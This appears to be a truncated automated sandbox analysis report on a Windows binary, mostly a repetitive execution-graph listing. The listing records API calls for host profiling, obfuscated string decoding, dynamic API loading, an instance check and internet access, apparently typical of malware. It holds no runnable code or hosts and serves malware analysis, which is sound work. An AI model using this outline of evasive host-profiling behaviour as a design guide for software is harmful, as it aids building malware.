                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                              • String ID: tAB
                                                                                                                                                                                                                                                              • API String ID: 3728558374-3708372838
                                                                                                                                                                                                                                                              • Opcode ID: 0b5a25ec8658adcdf39324c624ed28cb706a99bd5b3b82256d3a41df1fa63ec0
                                                                                                                                                                                                                                                              • Instruction ID: 4c9a41a057404f6d95e74594dc36f162ad66326a0e50a776c5ae253ed81911a0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5a25ec8658adcdf39324c624ed28cb706a99bd5b3b82256d3a41df1fa63ec0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70E09B75D1020DBACF20EFB4D8417CD77B89F50395F20C2A6F81495080DB70D688CB81
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:5.6%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0.9%
                                                                                                                                                                                                                                                              Signature Coverage:4.3%
                                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                                              Total number of Limit Nodes:36
                                                                                                                                                                                                                                                              execution_graph 78654 412333 78655 41233e 78654->78655 78658 4010d8 _EH_prolog 78655->78658 78657 41234a 78659 4010f8 78658->78659 78659->78657 78660 1982fd40 78661 1982fd67 78660->78661 78662 1982fdf4 ReadFile 78661->78662 78663 1982fd83 78661->78663 78662->78661 78662->78663 78664 19837d30 78665 19837d43 78664->78665 78667 19837d49 78664->78667 78668 199b8d80 78665->78668 78669 199b8d8f 78668->78669 78670 199b8e6f 78669->78670 78672 19834cf0 78669->78672 78670->78667 78674 19834d30 78672->78674 78673 19834ed5 CreateFileW 78673->78674 78674->78673 78675 1983506d 78674->78675 78675->78670 78676 198232e7 78677 199ff01a 78676->78677 78678 199ff06d RtlReAllocateHeap 78677->78678 78679 199ff027 78677->78679 78678->78677 78678->78679 78680 415ad9 LoadLibraryA 78681 415b17 6 API calls 78680->78681 78685 415af4 78680->78685 78713 401043 78681->78713 78684 415b6a 78686 415bc0 78684->78686 78687 415b6e 11 API calls 78684->78687 78685->78681 78688 401043 7 API calls 78686->78688 78687->78686 78689 415bc5 8 API calls 78688->78689 78720 402512 78689->78720 78697 415c19 78818 40e463 _EH_prolog lstrlen 78697->78818 78700 40e463 4 API calls 78701 415c40 78700->78701 78702 40e463 4 API calls 78701->78702 78703 415c47 78702->78703 78822 40e3a8 78703->78822 78705 415c50 78706 415c91 OpenEventA 78705->78706 78707 415c77 CloseHandle Sleep 78706->78707 78708 415c9e 78706->78708 79007 40e521 78707->79007 78710 415ca6 CreateEventA 78708->78710 78826 4152aa _EH_prolog 78710->78826 79008 40e683 GetProcessHeap HeapAlloc GetComputerNameA 78713->79008 78715 401076 Sleep Sleep Sleep Sleep 78715->78684 78716 40104d 78716->78715 79010 40e651 GetProcessHeap HeapAlloc GetUserNameA 78716->79010 78718 401063 78718->78715 78719 40106f ExitProcess 78718->78719 79011 40249b memset 78720->79011 78722 402526 78723 40249b 9 API calls 78722->78723 78724 402537 78723->78724 78725 40249b 9 API calls 78724->78725 78726 402548 78725->78726 78727 40249b 9 API calls 78726->78727 78728 402559 78727->78728 78729 40249b 9 API calls 78728->78729 78730 40256a 78729->78730 78731 40249b 9 API calls 78730->78731 78732 40257b 78731->78732 78733 40249b 9 API calls 78732->78733 78734 40258c 78733->78734 78735 40249b 9 API calls 78734->78735 78736 40259d 78735->78736 78737 40249b 9 API calls 78736->78737 78738 4025ae 78737->78738 78739 40249b 9 API calls 78738->78739 78740 4025bf 78739->78740 78741 40249b 9 API calls 78740->78741 78742 4025d0 78741->78742 78743 40249b 9 API calls 78742->78743 78744 4025e1 78743->78744 78745 40249b 9 API calls 78744->78745 78746 4025f2 78745->78746 78747 40249b 9 API calls 78746->78747 78748 402603 78747->78748 78749 40249b 9 API calls 78748->78749 78750 402614 78749->78750 78751 40249b 9 API calls 78750->78751 78752 402625 78751->78752 78753 40249b 9 API calls 78752->78753 78754 402636 78753->78754 78755 40249b 9 API calls 78754->78755 78756 402647 78755->78756 78757 40249b 9 API calls 78756->78757 78758 402658 78757->78758 78759 40249b 9 API calls 78758->78759 78760 402669 78759->78760 78761 40249b 9 API calls 78760->78761 78762 40267a 78761->78762 78763 40249b 9 API calls 78762->78763 78764 40268b 78763->78764 78765 40249b 9 API calls 78764->78765 78766 40269c 78765->78766 78767 40249b 9 API calls 78766->78767 78768 4026ad 78767->78768 78769 40249b 9 API calls 78768->78769 78770 4026be 78769->78770 78771 40249b 9 API calls 78770->78771 78772 4026cf 78771->78772 78773 40249b 9 API calls 78772->78773 78774 4026e0 78773->78774 78775 40249b 9 API calls 78774->78775 78776 4026f1 78775->78776 78777 40249b 9 API calls 78776->78777 78778 402702 78777->78778 78779 40249b 9 API calls 78778->78779 78780 402713 78779->78780 78781 40249b 9 API calls 78780->78781 78782 402724 78781->78782 78783 40249b 9 API calls 78782->78783 78784 402735 78783->78784 78785 40249b 9 API calls 78784->78785 78786 402746 78785->78786 78787 40249b 9 API calls 78786->78787 78788 402757 78787->78788 78789 40249b 9 API calls 78788->78789 78790 402768 78789->78790 78791 40249b 9 API calls 78790->78791 78792 402779 78791->78792 78793 40249b 9 API calls 78792->78793 78794 40278a 78793->78794 78795 40249b 9 API calls 78794->78795 78796 40279b 78795->78796 78797 415d81 78796->78797 79032 415cd3 GetPEB 78797->79032 78799 415d86 78800 415f85 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 78799->78800 78803 415d93 78799->78803 78801 415fe3 GetProcAddress 78800->78801 78802 415ff5 78800->78802 78801->78802 78804 416027 78802->78804 78805 415ffe GetProcAddress GetProcAddress 78802->78805 78808 415db4 20 API calls 78803->78808 78806 416030 GetProcAddress 78804->78806 78807 416042 78804->78807 78805->78804 78806->78807 78809 41604b GetProcAddress 78807->78809 78810 41605d 78807->78810 78808->78800 78809->78810 78811 416066 GetProcAddress GetProcAddress 78810->78811 78812 415c07 78810->78812 78811->78812 78813 40e2ea 78812->78813 78814 40e2f8 78813->78814 78815 40e31a 78814->78815 78816 40e310 lstrcpy 78814->78816 78817 40e651 GetProcessHeap HeapAlloc GetUserNameA 78815->78817 78816->78815 78817->78697 78819 40e4a3 78818->78819 78820 40e4c8 78819->78820 78821 40e4b5 lstrcpy lstrcat 78819->78821 78820->78700 78821->78820 78824 40e3be 78822->78824 78823 40e3e7 78823->78705 78824->78823 78825 40e3df lstrcpy 78824->78825 78825->78823 78827 4152be 78826->78827 78828 40e2ea lstrcpy 78827->78828 78829 4152d1 78828->78829 79033 411f49 _EH_prolog 78829->79033 78831 4152e1 79035 411ff8 _EH_prolog 78831->79035 78833 4152f0 79037 40e35e lstrlen 78833->79037 78836 40e35e 2 API calls 78837 415311 78836->78837 79041 4027a2 78837->79041 78843 4153de 78844 40e3a8 lstrcpy 78843->78844 78845 4153f0 78844->78845 79631 401128 _EH_prolog 78845->79631 78853 41543e 78854 40e3a8 lstrcpy 78853->78854 78855 415450 78854->78855 78856 40e3a8 lstrcpy 78855->78856 78857 415462 78856->78857 79756 40e321 78857->79756 78860 40e463 4 API calls 78861 415486 78860->78861 78862 40e3a8 lstrcpy 78861->78862 78863 415493 78862->78863 79760 40e3ef _EH_prolog 78863->79760 78866 40e3a8 lstrcpy 78867 4154bf 78866->78867 78868 4154da InternetOpenA 78867->78868 79764 40e521 78868->79764 78870 4154f6 InternetOpenA 78871 40e321 lstrcpy 78870->78871 78872 415526 78871->78872 79765 4020a3 78872->79765 78877 40e321 lstrcpy 78878 415560 78877->78878 79787 403aa8 _EH_prolog 78878->79787 78880 41556a 79923 41068e _EH_prolog 78880->79923 78882 415572 78883 40e2ea lstrcpy 78882->78883 78884 4155a6 78883->78884 78885 401128 2 API calls 78884->78885 78886 4155be 78885->78886 79943 405114 _EH_prolog 78886->79943 78888 4155c8 80124 4100cb _EH_prolog 78888->80124 78890 4155d0 78891 40e2ea lstrcpy 78890->78891 78892 4155f8 78891->78892 78893 401128 2 API calls 78892->78893 78894 415610 78893->78894 78895 405114 46 API calls 78894->78895 78896 41561a 78895->78896 80132 40ff70 _EH_prolog 78896->80132 78898 415622 78899 401128 2 API calls 78898->78899 78900 415636 78899->78900 80143 41313d _EH_prolog 78900->80143 78903 40e321 lstrcpy 78904 41564f 78903->78904 78905 40e2ea lstrcpy 78904->78905 78906 415669 78905->78906 80491 404165 _EH_prolog 78906->80491 78908 415672 78909 401128 2 API calls 78908->78909 78910 4156a2 78909->78910 80510 40d2ba _EH_prolog 78910->80510 79007->78706 79009 40e6b9 79008->79009 79009->78716 79010->78718 79016 402420 79011->79016 79015 4024fa memset 79015->78722 79028 416c10 79016->79028 79020 402462 CryptStringToBinaryA 79021 40f594 79020->79021 79022 402482 CryptStringToBinaryA 79021->79022 79023 402494 strcat GetProcessHeap RtlAllocateHeap 79022->79023 79024 4022cc 79023->79024 79025 4022df 79024->79025 79026 40234f ??_U@YAPAXI 79025->79026 79027 40236a 79026->79027 79027->79015 79029 40242d memset 79028->79029 79030 40f594 79029->79030 79031 40f5a0 79030->79031 79031->79020 79031->79031 79032->78799 79034 411f5f 79033->79034 79034->78831 79036 41200e 79035->79036 79036->78833 79039 40e376 79037->79039 79038 40e3a1 79038->78836 79039->79038 79040 40e397 lstrcpy 79039->79040 79040->79038 79042 40249b 9 API calls 79041->79042 79043 4027ac 79042->79043 79044 40249b 9 API calls 79043->79044 79045 4027bd 79044->79045 79046 40249b 9 API calls 79045->79046 79047 4027ce 79046->79047 79048 40249b 9 API calls 79047->79048 79049 4027df 79048->79049 79050 40249b 9 API calls 79049->79050 79051 4027f0 79050->79051 79052 40249b 9 API calls 79051->79052 79053 402801 79052->79053 79054 40249b 9 API calls 79053->79054 79055 402812 79054->79055 79056 40249b 9 API calls 79055->79056 79057 402823 79056->79057 79058 40249b 9 API calls 79057->79058 79059 402834 79058->79059 79060 40249b 9 API calls 79059->79060 79061 402845 79060->79061 79062 40249b 9 API calls 79061->79062 79063 402856 79062->79063 79064 40249b 9 API calls 79063->79064 79065 402867 79064->79065 79066 40249b 9 API calls 79065->79066 79067 402878 79066->79067 79068 40249b 9 API calls 79067->79068 79069 402889 79068->79069 79070 40249b 9 API calls 79069->79070 79071 40289a 79070->79071 79072 40249b 9 API calls 79071->79072 79073 4028ab 79072->79073 79074 40249b 9 API calls 79073->79074 79075 4028bc 79074->79075 79076 40249b 9 API calls 79075->79076 79077 4028cd 79076->79077 79078 40249b 9 API calls 79077->79078 79079 4028de 79078->79079 79080 40249b 9 API calls 79079->79080 79081 4028ef 79080->79081 79082 40249b 9 API calls 79081->79082 79083 402900 79082->79083 79084 40249b 9 API calls 79083->79084 79085 402911 79084->79085 79086 40249b 9 API calls 79085->79086 79087 402922 79086->79087 79088 40249b 9 API calls 79087->79088 79089 402933 79088->79089 79090 40249b 9 API calls 79089->79090 79091 402944 79090->79091 79092 40249b 9 API calls 79091->79092 79093 402955 79092->79093 79094 40249b 9 API calls 79093->79094 79095 402966 79094->79095 79096 40249b 9 API calls 79095->79096 79097 402977 79096->79097 79098 40249b 9 API calls 79097->79098 79099 402988 79098->79099 79100 40249b 9 API calls 79099->79100 79101 402999 79100->79101 79102 40249b 9 API calls 79101->79102 79103 4029aa 79102->79103 79104 40249b 9 API calls 79103->79104 79105 4029bb 79104->79105 79106 40249b 9 API calls 79105->79106 79107 4029cc 79106->79107 79108 40249b 9 API calls 79107->79108 79109 4029dd 79108->79109 79110 40249b 9 API calls 79109->79110 79111 4029ee 79110->79111 79112 40249b 9 API calls 79111->79112 79113 4029ff 79112->79113 79114 40249b 9 API calls 79113->79114 79115 402a10 79114->79115 79116 40249b 9 API calls 79115->79116 79117 402a21 79116->79117 79118 40249b 9 API calls 79117->79118 79119 402a32 79118->79119 79120 40249b 9 API calls 79119->79120 79121 402a43 79120->79121 79122 40249b 9 API calls 79121->79122 79123 402a54 79122->79123 79124 40249b 9 API calls 79123->79124 79125 402a65 79124->79125 79126 40249b 9 API calls 79125->79126 79127 402a76 79126->79127 79128 40249b 9 API calls 79127->79128 79129 402a87 79128->79129 79130 40249b 9 API calls 79129->79130 79131 402a98 79130->79131 79132 40249b 9 API calls 79131->79132 79133 402aa9 79132->79133 79134 40249b 9 API calls 79133->79134 79135 402aba 79134->79135 79136 40249b 9 API calls 79135->79136 79137 402acb 79136->79137 79138 40249b 9 API calls 79137->79138 79139 402adc 79138->79139 79140 40249b 9 API calls 79139->79140 79141 402aed 79140->79141 79142 40249b 9 API calls 79141->79142 79143 402afe 79142->79143 79144 40249b 9 API calls 79143->79144 79145 402b0f 79144->79145 79146 40249b 9 API calls 79145->79146 79147 402b20 79146->79147 79148 40249b 9 API calls 79147->79148 79149 402b31 79148->79149 79150 40249b 9 API calls 79149->79150 79151 402b42 79150->79151 79152 40249b 9 API calls 79151->79152 79153 402b53 79152->79153 79154 40249b 9 API calls 79153->79154 79155 402b64 79154->79155 79156 40249b 9 API calls 79155->79156 79157 402b75 79156->79157 79158 40249b 9 API calls 79157->79158 79159 402b86 79158->79159 79160 40249b 9 API calls 79159->79160 79161 402b97 79160->79161 79162 40249b 9 API calls 79161->79162 79163 402ba8 79162->79163 79164 40249b 9 API calls 79163->79164 79165 402bb9 79164->79165 79166 40249b 9 API calls 79165->79166 79167 402bca 79166->79167 79168 40249b 9 API calls 79167->79168 79169 402bdb 79168->79169 79170 40249b 9 API calls 79169->79170 79171 402bec 79170->79171 79172 40249b 9 API calls 79171->79172 79173 402bfd 79172->79173 79174 40249b 9 API calls 79173->79174 79175 402c0e 79174->79175 79176 40249b 9 API calls 79175->79176 79177 402c1f 79176->79177 79178 40249b 9 API calls 79177->79178 79179 402c30 79178->79179 79180 40249b 9 API calls 79179->79180 79181 402c41 79180->79181 79182 40249b 9 API calls 79181->79182 79183 402c52 79182->79183 79184 40249b 9 API calls 79183->79184 79185 402c63 79184->79185 79186 40249b 9 API calls 79185->79186 79187 402c74 79186->79187 79188 40249b 9 API calls 79187->79188 79189 402c85 79188->79189 79190 40249b 9 API calls 79189->79190 79191 402c96 79190->79191 79192 40249b 9 API calls 79191->79192 79193 402ca7 79192->79193 79194 40249b 9 API calls 79193->79194 79195 402cb8 79194->79195 79196 40249b 9 API calls 79195->79196 79197 402cc9 79196->79197 79198 40249b 9 API calls 79197->79198 79199 402cda 79198->79199 79200 40249b 9 API calls 79199->79200 79201 402ceb 79200->79201 79202 40249b 9 API calls 79201->79202 79203 402cfc 79202->79203 79204 40249b 9 API calls 79203->79204 79205 402d0d 79204->79205 79206 40249b 9 API calls 79205->79206 79207 402d1e 79206->79207 79208 40249b 9 API calls 79207->79208 79209 402d2f 79208->79209 79210 40249b 9 API calls 79209->79210 79211 402d40 79210->79211 79212 40249b 9 API calls 79211->79212 79213 402d51 79212->79213 79214 40249b 9 API calls 79213->79214 79215 402d62 79214->79215 79216 40249b 9 API calls 79215->79216 79217 402d73 79216->79217 79218 40249b 9 API calls 79217->79218 79219 402d84 79218->79219 79220 40249b 9 API calls 79219->79220 79221 402d95 79220->79221 79222 40249b 9 API calls 79221->79222 79223 402da6 79222->79223 79224 40249b 9 API calls 79223->79224 79225 402db7 79224->79225 79226 40249b 9 API calls 79225->79226 79227 402dc8 79226->79227 79228 40249b 9 API calls 79227->79228 79229 402dd9 79228->79229 79230 40249b 9 API calls 79229->79230 79231 402dea 79230->79231 79232 40249b 9 API calls 79231->79232 79233 402dfb 79232->79233 79234 40249b 9 API calls 79233->79234 79235 402e0c 79234->79235 79236 40249b 9 API calls 79235->79236 79237 402e1d 79236->79237 79238 40249b 9 API calls 79237->79238 79239 402e2e 79238->79239 79240 40249b 9 API calls 79239->79240 79241 402e3f 79240->79241 79242 40249b 9 API calls 79241->79242 79243 402e50 79242->79243 79244 40249b 9 API calls 79243->79244 79245 402e61 79244->79245 79246 40249b 9 API calls 79245->79246 79247 402e72 79246->79247 79248 40249b 9 API calls 79247->79248 79249 402e83 79248->79249 79250 40249b 9 API calls 79249->79250 79251 402e94 79250->79251 79252 40249b 9 API calls 79251->79252 79253 402ea5 79252->79253 79254 40249b 9 API calls 79253->79254 79255 402eb6 79254->79255 79256 40249b 9 API calls 79255->79256 79257 402ec7 79256->79257 79258 40249b 9 API calls 79257->79258 79259 402ed8 79258->79259 79260 40249b 9 API calls 79259->79260 79261 402ee9 79260->79261 79262 40249b 9 API calls 79261->79262 79263 402efa 79262->79263 79264 40249b 9 API calls 79263->79264 79265 402f0b 79264->79265 79266 40249b 9 API calls 79265->79266 79267 402f1c 79266->79267 79268 40249b 9 API calls 79267->79268 79269 402f2d 79268->79269 79270 40249b 9 API calls 79269->79270 79271 402f3e 79270->79271 79272 40249b 9 API calls 79271->79272 79273 402f4f 79272->79273 79274 40249b 9 API calls 79273->79274 79275 402f60 79274->79275 79276 40249b 9 API calls 79275->79276 79277 402f71 79276->79277 79278 40249b 9 API calls 79277->79278 79279 402f82 79278->79279 79280 40249b 9 API calls 79279->79280 79281 402f93 79280->79281 79282 40249b 9 API calls 79281->79282 79283 402fa4 79282->79283 79284 40249b 9 API calls 79283->79284 79285 402fb5 79284->79285 79286 40249b 9 API calls 79285->79286 79287 402fc6 79286->79287 79288 40249b 9 API calls 79287->79288 79289 402fd7 79288->79289 79290 40249b 9 API calls 79289->79290 79291 402fe8 79290->79291 79292 40249b 9 API calls 79291->79292 79293 402ff9 79292->79293 79294 40249b 9 API calls 79293->79294 79295 40300a 79294->79295 79296 40249b 9 API calls 79295->79296 79297 40301b 79296->79297 79298 40249b 9 API calls 79297->79298 79299 40302c 79298->79299 79300 40249b 9 API calls 79299->79300 79301 40303d 79300->79301 79302 40249b 9 API calls 79301->79302 79303 40304e 79302->79303 79304 40249b 9 API calls 79303->79304 79305 40305f 79304->79305 79306 40249b 9 API calls 79305->79306 79307 403070 79306->79307 79308 40249b 9 API calls 79307->79308 79309 403081 79308->79309 79310 40249b 9 API calls 79309->79310 79311 403092 79310->79311 79312 40249b 9 API calls 79311->79312 79313 4030a3 79312->79313 79314 40249b 9 API calls 79313->79314 79315 4030b4 79314->79315 79316 40249b 9 API calls 79315->79316 79317 4030c5 79316->79317 79318 40249b 9 API calls 79317->79318 79319 4030d6 79318->79319 79320 40249b 9 API calls 79319->79320 79321 4030e7 79320->79321 79322 40249b 9 API calls 79321->79322 79323 4030f8 79322->79323 79324 40249b 9 API calls 79323->79324 79325 403109 79324->79325 79326 40249b 9 API calls 79325->79326 79327 40311a 79326->79327 79328 40249b 9 API calls 79327->79328 79329 40312b 79328->79329 79330 40249b 9 API calls 79329->79330 79331 40313c 79330->79331 79332 40249b 9 API calls 79331->79332 79333 40314d 79332->79333 79334 40249b 9 API calls 79333->79334 79335 40315e 79334->79335 79336 40249b 9 API calls 79335->79336 79337 40316f 79336->79337 79338 40249b 9 API calls 79337->79338 79339 403180 79338->79339 79340 40249b 9 API calls 79339->79340 79341 403191 79340->79341 79342 40249b 9 API calls 79341->79342 79343 4031a2 79342->79343 79344 40249b 9 API calls 79343->79344 79345 4031b3 79344->79345 79346 40249b 9 API calls 79345->79346 79347 4031c4 79346->79347 79348 40249b 9 API calls 79347->79348 79349 4031d5 79348->79349 79350 40249b 9 API calls 79349->79350 79351 4031e6 79350->79351 79352 40249b 9 API calls 79351->79352 79353 4031f7 79352->79353 79354 40249b 9 API calls 79353->79354 79355 403208 79354->79355 79356 40249b 9 API calls 79355->79356 79357 403219 79356->79357 79358 40249b 9 API calls 79357->79358 79359 40322a 79358->79359 79360 40249b 9 API calls 79359->79360 79361 40323b 79360->79361 79362 40249b 9 API calls 79361->79362 79363 40324c 79362->79363 79364 40249b 9 API calls 79363->79364 79365 40325d 79364->79365 79366 40249b 9 API calls 79365->79366 79367 40326e 79366->79367 79368 40249b 9 API calls 79367->79368 79369 40327f 79368->79369 79370 40249b 9 API calls 79369->79370 79371 403290 79370->79371 79372 40249b 9 API calls 79371->79372 79373 4032a1 79372->79373 79374 40249b 9 API calls 79373->79374 79375 4032b2 79374->79375 79376 40249b 9 API calls 79375->79376 79377 4032c3 79376->79377 79378 40249b 9 API calls 79377->79378 79379 4032d4 79378->79379 79380 40249b 9 API calls 79379->79380 79381 4032e5 79380->79381 79382 40249b 9 API calls 79381->79382 79383 4032f6 79382->79383 79384 40249b 9 API calls 79383->79384 79385 403307 79384->79385 79386 40249b 9 API calls 79385->79386 79387 403318 79386->79387 79388 40249b 9 API calls 79387->79388 79389 403329 79388->79389 79390 40249b 9 API calls 79389->79390 79391 40333a 79390->79391 79392 40249b 9 API calls 79391->79392 79393 40334b 79392->79393 79394 40249b 9 API calls 79393->79394 79395 40335c 79394->79395 79396 40249b 9 API calls 79395->79396 79397 40336d 79396->79397 79398 40249b 9 API calls 79397->79398 79399 40337e 79398->79399 79400 40249b 9 API calls 79399->79400 79401 40338f 79400->79401 79402 40249b 9 API calls 79401->79402 79403 4033a0 79402->79403 79404 40249b 9 API calls 79403->79404 79405 4033b1 79404->79405 79406 40249b 9 API calls 79405->79406 79407 4033c2 79406->79407 79408 40249b 9 API calls 79407->79408 79409 4033d3 79408->79409 79410 40249b 9 API calls 79409->79410 79411 4033e4 79410->79411 79412 40249b 9 API calls 79411->79412 79413 4033f5 79412->79413 79414 40249b 9 API calls 79413->79414 79415 403406 79414->79415 79416 40249b 9 API calls 79415->79416 79417 403417 79416->79417 79418 40249b 9 API calls 79417->79418 79419 403428 79418->79419 79420 40249b 9 API calls 79419->79420 79421 403439 79420->79421 79422 40249b 9 API calls 79421->79422 79423 40344a 79422->79423 79424 40249b 9 API calls 79423->79424 79425 40345b 79424->79425 79426 40249b 9 API calls 79425->79426 79427 40346c 79426->79427 79428 40249b 9 API calls 79427->79428 79429 40347d 79428->79429 79430 40249b 9 API calls 79429->79430 79431 40348e 79430->79431 79432 40249b 9 API calls 79431->79432 79433 40349f 79432->79433 79434 40249b 9 API calls 79433->79434 79435 4034b0 79434->79435 79436 40249b 9 API calls 79435->79436 79437 4034c1 79436->79437 79438 40249b 9 API calls 79437->79438 79439 4034d2 79438->79439 79440 40249b 9 API calls 79439->79440 79441 4034e3 79440->79441 79442 40249b 9 API calls 79441->79442 79443 4034f4 79442->79443 79444 40249b 9 API calls 79443->79444 79445 403505 79444->79445 79446 40249b 9 API calls 79445->79446 79447 403516 79446->79447 79448 40249b 9 API calls 79447->79448 79449 403527 79448->79449 79450 40249b 9 API calls 79449->79450 79451 403538 79450->79451 79452 40249b 9 API calls 79451->79452 79453 403549 79452->79453 79454 40249b 9 API calls 79453->79454 79455 40355a 79454->79455 79456 40249b 9 API calls 79455->79456 79457 40356b 79456->79457 79458 40249b 9 API calls 79457->79458 79459 40357c 79458->79459 79460 40249b 9 API calls 79459->79460 79461 40358d 79460->79461 79462 40249b 9 API calls 79461->79462 79463 40359e 79462->79463 79464 40249b 9 API calls 79463->79464 79465 4035af 79464->79465 79466 40249b 9 API calls 79465->79466 79467 4035c0 79466->79467 79468 40249b 9 API calls 79467->79468 79469 4035d1 79468->79469 79470 40249b 9 API calls 79469->79470 79471 4035e2 79470->79471 79472 40249b 9 API calls 79471->79472 79473 4035f3 79472->79473 79474 40249b 9 API calls 79473->79474 79475 403604 79474->79475 79476 40249b 9 API calls 79475->79476 79477 403615 79476->79477 79478 40249b 9 API calls 79477->79478 79479 403626 79478->79479 79480 40249b 9 API calls 79479->79480 79481 403637 79480->79481 79482 40249b 9 API calls 79481->79482 79483 403648 79482->79483 79484 40249b 9 API calls 79483->79484 79485 403659 79484->79485 79486 40249b 9 API calls 79485->79486 79487 40366a 79486->79487 79488 40249b 9 API calls 79487->79488 79489 40367b 79488->79489 79490 40249b 9 API calls 79489->79490 79491 40368c 79490->79491 79492 40249b 9 API calls 79491->79492 79493 40369d 79492->79493 79494 40249b 9 API calls 79493->79494 79495 4036ae 79494->79495 79496 40249b 9 API calls 79495->79496 79497 4036bf 79496->79497 79498 40249b 9 API calls 79497->79498 79499 4036d0 79498->79499 79500 40249b 9 API calls 79499->79500 79501 4036e1 79500->79501 79502 40249b 9 API calls 79501->79502 79503 4036f2 79502->79503 79504 40249b 9 API calls 79503->79504 79505 403703 79504->79505 79506 40249b 9 API calls 79505->79506 79507 403714 79506->79507 79508 40249b 9 API calls 79507->79508 79509 403725 79508->79509 79510 40249b 9 API calls 79509->79510 79511 403736 79510->79511 79512 40249b 9 API calls 79511->79512 79513 403747 79512->79513 79514 40249b 9 API calls 79513->79514 79515 403758 79514->79515 79516 40249b 9 API calls 79515->79516 79517 403769 79516->79517 79518 40249b 9 API calls 79517->79518 79519 40377a 79518->79519 79520 40249b 9 API calls 79519->79520 79521 40378b 79520->79521 79522 40249b 9 API calls 79521->79522 79523 40379c 79522->79523 79524 40249b 9 API calls 79523->79524 79525 4037ad 79524->79525 79526 40249b 9 API calls 79525->79526 79527 4037be 79526->79527 79528 40249b 9 API calls 79527->79528 79529 4037cf 79528->79529 79530 40249b 9 API calls 79529->79530 79531 4037e0 79530->79531 79532 40249b 9 API calls 79531->79532 79533 4037f1 79532->79533 79534 40249b 9 API calls 79533->79534 79535 403802 79534->79535 79536 40249b 9 API calls 79535->79536 79537 403813 79536->79537 79538 40249b 9 API calls 79537->79538 79539 403824 79538->79539 79540 40249b 9 API calls 79539->79540 79541 403835 79540->79541 79542 40249b 9 API calls 79541->79542 79543 403846 79542->79543 79544 40249b 9 API calls 79543->79544 79545 403857 79544->79545 79546 40249b 9 API calls 79545->79546 79547 403868 79546->79547 79548 40249b 9 API calls 79547->79548 79549 403879 79548->79549 79550 40249b 9 API calls 79549->79550 79551 40388a 79550->79551 79552 40249b 9 API calls 79551->79552 79553 40389b 79552->79553 79554 40249b 9 API calls 79553->79554 79555 4038ac 79554->79555 79556 40249b 9 API calls 79555->79556 79557 4038bd 79556->79557 79558 40249b 9 API calls 79557->79558 79559 4038ce 79558->79559 79560 40249b 9 API calls 79559->79560 79561 4038df 79560->79561 79562 40249b 9 API calls 79561->79562 79563 4038f0 79562->79563 79564 40249b 9 API calls 79563->79564 79565 403901 79564->79565 79566 40249b 9 API calls 79565->79566 79567 403912 79566->79567 79568 40249b 9 API calls 79567->79568 79569 403923 79568->79569 79570 40249b 9 API calls 79569->79570 79571 403934 79570->79571 79572 40249b 9 API calls 79571->79572 79573 403945 79572->79573 79574 40249b 9 API calls 79573->79574 79575 403956 79574->79575 79576 40249b 9 API calls 79575->79576 79577 403967 79576->79577 79578 40249b 9 API calls 79577->79578 79579 403978 79578->79579 79580 40249b 9 API calls 79579->79580 79581 403989 79580->79581 79582 40249b 9 API calls 79581->79582 79583 40399a 79582->79583 79584 40249b 9 API calls 79583->79584 79585 4039ab 79584->79585 79586 40249b 9 API calls 79585->79586 79587 4039bc 79586->79587 79588 40249b 9 API calls 79587->79588 79589 4039cd 79588->79589 79590 40249b 9 API calls 79589->79590 79591 4039de 79590->79591 79592 40249b 9 API calls 79591->79592 79593 4039ef 79592->79593 79594 40249b 9 API calls 79593->79594 79595 403a00 79594->79595 79596 41608f 79595->79596 79597 416474 9 API calls 79596->79597 79598 41609c 43 API calls 79596->79598 79599 416583 79597->79599 79600 416515 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79597->79600 79598->79597 79601 416590 8 API calls 79599->79601 79602 416643 79599->79602 79600->79599 79601->79602 79603 4166ba 79602->79603 79604 41664c GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79602->79604 79605 4166c7 6 API calls 79603->79605 79606 41674c 79603->79606 79604->79603 79605->79606 79607 416823 79606->79607 79608 416759 9 API calls 79606->79608 79609 41689a 79607->79609 79610 41682c GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79607->79610 79608->79607 79611 4168a3 GetProcAddress GetProcAddress 79609->79611 79612 4168cc 79609->79612 79610->79609 79611->79612 79613 4168d5 GetProcAddress GetProcAddress 79612->79613 79614 4168fe 79612->79614 79613->79614 79615 41690b 10 API calls 79614->79615 79616 4169ea 79614->79616 79615->79616 79617 4169f3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79616->79617 79618 416a4a 79616->79618 79617->79618 79619 416a53 GetProcAddress 79618->79619 79620 416a65 79618->79620 79619->79620 79621 416ac5 79620->79621 79622 416a6e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 79620->79622 79623 4153d3 79621->79623 79624 416ace GetProcAddress 79621->79624 79622->79621 79625 40f5de _EH_prolog 79623->79625 79624->79623 79626 40e2ea lstrcpy 79625->79626 79627 40f605 79626->79627 79628 40e2ea lstrcpy 79627->79628 79629 40f61c GetSystemTime 79628->79629 79630 40f63a 79629->79630 79630->78843 79632 40e321 lstrcpy 79631->79632 79633 401143 79632->79633 79634 40e321 lstrcpy 79633->79634 79635 401153 79634->79635 79636 40e321 lstrcpy 79635->79636 79637 401163 79636->79637 79638 